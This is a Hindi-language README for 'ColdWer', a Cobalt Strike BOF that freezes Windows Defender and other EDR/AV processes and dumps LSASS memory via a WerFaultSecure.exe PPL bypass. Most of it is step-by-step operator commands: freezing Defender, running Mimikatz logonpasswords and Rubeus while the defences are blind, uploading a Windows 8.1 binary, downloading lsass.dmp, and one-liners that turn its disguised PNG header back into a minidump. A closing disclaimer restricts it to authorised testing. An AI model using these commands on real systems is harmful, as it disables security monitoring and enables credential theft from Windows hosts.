
Cobalt Strike BOF जो EDR/AV प्रक्रियाओं को फ्रीज़ करता है और WerFaultSecure.exe PPL बाईपास का उपयोग करके LSASS को डंप करता है
आपके एंडपॉइंट पर एक शीत युद्ध।
ColdWer WerFaultSecure.exe PPL बाईपास का उपयोग करके आधुनिक Windows सिस्टम पर EDR/AV प्रक्रियाओं को फ़्रीज़ करता है और LSASS मेमोरी डंप करता है।
C O L D W E R
└─┴─┴── WerFaultSecure
└─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)
अपने EDR/AV को फ़्रीज़ करें। जो चाहिए वो निकालें। ठंडे रहें।
Sh3llf1r3 (@0xsh3llf1r3)
यह प्रोजेक्ट TwoSevenOneT (@TwoSevenOneT) के शोध पर आधारित है:
| प्रोजेक्ट | विवरण |
|---|---|
| EDR-Freeze | मूल EDR फ़्रीज़ तकनीक |
| WSASS | WerFaultSecure के माध्यम से LSASS डंप |
अंतर्निहित तकनीकों का सारा श्रेय TwoSevenOneT को जाता है।
git clone https://github.com/0xsh3llf1r3/ColdWer.git
cw/coldwer.cna चुनें# स्रोत निर्देशिका पर जाएँ
cd src/
# BOF संकलित करें (MinGW आवश्यक)
make
# या मैन्युअल रूप से:
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o
coldwer.o और coldwer.cna डाउनलोड करेंcoldwer.cna लोड करें# Windows Defender PID खोजें
beacon> ps
# प्रक्रिया फ़्रीज़ करें
beacon> cw-freeze 1337
# EDR/AV फ़्रीज़ होने पर अपने कमांड निष्पादित करें
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage
# समाप्त होने पर अनफ़्रीज़ करें
beacon> cw-unfreeze
# चरण 1: Win8.1 WerFaultSecure.exe अपलोड करें
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe
# चरण 2: LSASS PID खोजें
beacon> ps
# चरण 3: LSASS डंप करें
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe
# चरण 4: डंप डाउनलोड करें
beacon> download C:\Windows\Temp\lsass.dmp
मिनीडंप प्रारूप पुनर्स्थापित करने के लिए फ़ाइल हेडर बदलें:
| मूल (PNG) | इसे बदलें (MDMP) |
|---|---|
89 50 4E 47 | 4D 44 4D 50 |
हेडर पुनर्स्थापित करने के कमांड:
| तरीका | कमांड |
|---|---|
| Python | open('lsass.dmp','r+b').write(b'MDMP') |
| Bash | printf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc |
| PowerShell | $f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close() |
फिर Mimikatz से पार्स करें:
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords
| कमांड | विवरण |
|---|---|
cw-freeze <PID> [Path] | प्रक्रिया फ़्रीज़ करें |
cw-unfreeze | पहले फ़्रीज़ की गई प्रक्रिया को अनफ़्रीज़ करें |
cw-dump <PID> <Path> | LSASS मेमोरी डंप करें |
# डिफ़ॉल्ट पथ से फ़्रीज़ करें
beacon> cw-freeze 1337
# कस्टम WerFaultSecure.exe का उपयोग करें
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe
# LSASS डंप करें
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe
# समाप्त होने पर अनफ़्रीज़ करें
beacon> cw-unfreeze
| लक्ष्य | स्थिति |
|---|---|
| Windows Defender (MsMpEng.exe) | ✅ काम करता है |
| LSASS (lsass.exe) | ✅ काम करता है |
| अन्य PPL प्रक्रियाएँ | ✅ काम करता है |
कर्नेल-मोड स्व-संरक्षण वाले EDR के विरुद्ध काम नहीं करता:
| EDR | स्थिति |
|---|---|
| Elastic Endpoint | ❌ अवरुद्ध |
| CrowdStrike Falcon | ❌ अवरुद्ध |
| SentinelOne | ❌ अवरुद्ध |
| Carbon Black | ❌ अवरुद्ध |
1. 🚀 WerFaultSecure.exe को PPL (WinTcb स्तर) के रूप में लॉन्च करें
↓
2. 🎯 WerFaultSecure लक्ष्य प्रक्रिया से जुड़ता है
↓
3. ⏸️ MiniDumpWriteDump सभी लक्ष्य थ्रेड को निलंबित करता है
↓
4. 🥶 WerFaultSecure को स्वयं निलंबित करें → लक्ष्य फ़्रीज़ रहता है
↓
5. ✅ अपने कमांड निष्पादित करें (EDR/AV नहीं देख सकता!)
↓
6. 🔥 WerFaultSecure को समाप्त करें → लक्ष्य अनफ़्रीज़ हो जाता है
| संस्करण | आउटपुट |
|---|---|
| Windows 10/11 | केवल एन्क्रिप्टेड डंप |
| Windows 8.1 | कच्चा अनएन्क्रिप्टेड डंप |
⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए
यह उपकरण इसके लिए अभिप्रेत है:
- अधिकृत पेनिट्रेशन परीक्षण
- लिखित अनुमति के साथ रेड टीम संचालन
- नियंत्रित वातावरण में सुरक्षा अनुसंधान
लेखक इस उपकरण के किसी भी दुरुपयोग या इससे होने वाली क्षति के लिए उत्तरदायी नहीं है।
कंप्यूटर सिस्टम में अनधिकृत पहुँच गैरकानूनी है।
MIT लाइसेंस - LICENSE देखें
🥶 ठंडे रहें। चुप रहें। 🥶
⭐ यदि यह उपयोगी लगे तो इस रिपॉजिटरी को स्टार करें! ⭐
| विशेषता | विवरण |
|---|
| ❄️ फ़्रीज़ | EDR/AV प्रक्रियाओं को कोमा अवस्था में डालें |
| 🔓 डंप | PPL को बायपास करके LSASS मेमोरी निकालें |
| 🛡️ PPL बाईपास | WinTcb स्तर पर WerFaultSecure.exe का लाभ उठाएं |
| ⚡ तेज़ | इनलाइन BOF निष्पादन |
| 🎯 मैन्युअल नियंत्रण | आप तय करें कब फ़्रीज़ और अनफ़्रीज़ करना है |
| त्रुटि | कारण | समाधान |
|---|
| फ़ाइल नहीं मिली | अमान्य पथ | WerFaultSecure.exe पथ जाँचें |
| पहुँच अस्वीकृत | कम विशेषाधिकार | Administrator/SYSTEM के रूप में चलाएँ |
| अमान्य हस्ताक्षर | अहस्ताक्षरित बाइनरी | उचित रूप से हस्ताक्षरित WerFaultSecure.exe का उपयोग करें |
| प्रक्रिया मौजूद नहीं है | गलत PID | ps कमांड से PID सत्यापित करें |
| लक्ष्य सुरक्षित | कर्नेल सुरक्षा | EDR स्व-संरक्षण (बायपास नहीं किया जा सकता) |
| पहले से फ़्रीज़ है | स्थिति अटक गई | पहले cw-unfreeze चलाएँ |